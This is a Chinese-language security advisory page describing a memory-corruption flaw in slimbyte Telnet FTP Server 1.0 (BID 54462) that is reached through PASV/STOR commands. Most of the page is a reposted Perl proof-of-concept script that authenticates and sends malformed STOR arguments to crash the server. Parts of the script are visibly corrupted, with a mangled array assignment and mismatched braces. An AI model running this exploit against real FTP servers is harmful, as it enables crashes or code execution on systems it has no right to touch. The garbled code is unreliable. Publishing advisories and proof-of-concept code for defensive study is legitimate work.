Telnet FTP Server 'PASV'命令远程内存破坏漏洞

发布日期:2012-07-16
更新日期:2012-07-17

受影响系统:
slimbyte Telnet FTP Server 1.0 build(1.218)
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54462

Telnet是远程登陆FTP服务器。

Telnet FTP Server 1.0 build(1.218)在实现上存在内存破坏漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。

<*来源:coolkaveh
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

coolkaveh ()提供了如下测试方法:


# Exploit Title: Telnet Ftp Server <= Memory Corruption PoC
# crash:
# Date: July 7, 2012
# Author: coolkaveh
# coolkaveh () rocketmail com
# https://twitter.com/coolkaveh
# Vendor Homepage:
# also download link available at :
# Version: 1.0  build(1.218)
# Tested on: windows 7 SP1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Crappy Telnet Ftp Server Memory Corruption PoC
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Thread;
$|=1;
$host=shift;
$port=shift || "21";
if(!defined($host)){
        print("usage: $0 \$host [\$port]\n");
        exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
        print "$host -> $port is alive.\n";
        $check_first->close;
}else{
        die("$host -> $port is closed!\n");
}
@bf1=(
'A'x5,
);
@bf2=(
'!)!)',
);
@bf3=(
'0',
);
@t= () bf1;
push(@t, @bf2);
push(@t, @bf3);
sub check(){
        #Thread->self->detach;
        $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
        if(defined $sock){
                #print "$host -> $port is alive.\n";
                undef($content_tmp);
                $sock->recv($content_tmp,100,0);
                if(length($content_tmp)>0){
                        $sock->close;
                        return 1;
                }else{
                        $sock->close;
                        return 0;
                }
        }else{
                #print("$host -> $port is closed!\n");
                return 0;
        }
}
#set PASV Mode send Socket
sub send_sock($){
        $send_port_num=shift;
        Thread->self->detach;
        $send_sock_tmp=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$send_port_num, Proto=>'tcp', Timeout=>30);
        if(defined($send_sock_tmp)){
                $send_sock_tmp->recv($mem,100,0);
                print "$mem\n";
                $mem=0;
                $send_sock_tmp->close;
                undef($send_port_num);
                return 1;
        }else{
                undef($send_port_num);
                return 0;
        }
}
print "Please enter the real username: ";
$real_username=<STDIN>;
chop($real_username);
print "Please enter the real password: ";
$real_password=<STDIN>;
chop($real_password);
@cm=(
'STOR',
'STOR',
);
$sock3=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,
Proto=>'tcp', Timeout=>30);
if(defined($sock3)){
        $sock3->recv($content, 100, 0);
        print "$content\n";
        sleep(2);
        $sock3->send("USER "."$real_username\r\n", 0);
        sleep(2);
        $sock3->recv($content, 100, 0);
        print "$content\n";
        sleep(2);
        $sock3->send("PASS "."$real_password\r\n", 0);
        sleep(2);
        $sock3->recv($content, 100, 0);
        print "$content\n";
        sleep(2);
        if($content=~m/^230/){
                $sock3->close;
        }else{
                $sock3->close;
                die("Username or Password is wrong!\n");
        }
}else{
        die "$host -> $port is closed!\n";
}
L_V_J: undef($cmd);
C_L: foreach $cmd (@cm){
        foreach $poc (@t){
                LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>'tcp', Timeout=>30);
                if(defined($sock4)){
                        $sock4->recv($content, 100, 0);
                        print "$content\n";
                        sleep(2);
                        $sock4->send("USER "."$real_username\r\n", 0);
                        sleep(2);
                        $sock4->recv($content, 100, 0);
                        print "$content\n";
                        sleep(2);
                        $sock4->send("PASS "."$real_password\r\n", 0);
                        sleep(2);
                        $sock4->recv($content, 100, 0);
                        print "$content\n";
                        sleep(2);
                        if(($cmd eq 'STOR')){
                                $sock4->send("PASV\r\n", 0);
                                sleep(2);
                                $sock4->recv($content, 100, 0);
                                print "$content\n";
                                sleep(2);
                                if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){
                                        $send_port=$5*256+$6;
                                }
                                }
                        }
                        $sock4->send("$cmd"." "."$poc\r\n", 0);
                Thread->new(\&send_sock,$send_port);
                        $sock4->send("$cmd"." "."$poc\r\n", 0);
                        sleep(2);
                        $sock4->recv($content, 100, 0);
                        $thread3=Thread->new(\&check);
                        undef($thread3);
                        $sock4->send("QUIT\r\n", 0);
                        }
                                }

建议:
--------------------------------------------------------------------------------
厂商补丁:

slimbyte
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwyzfs.html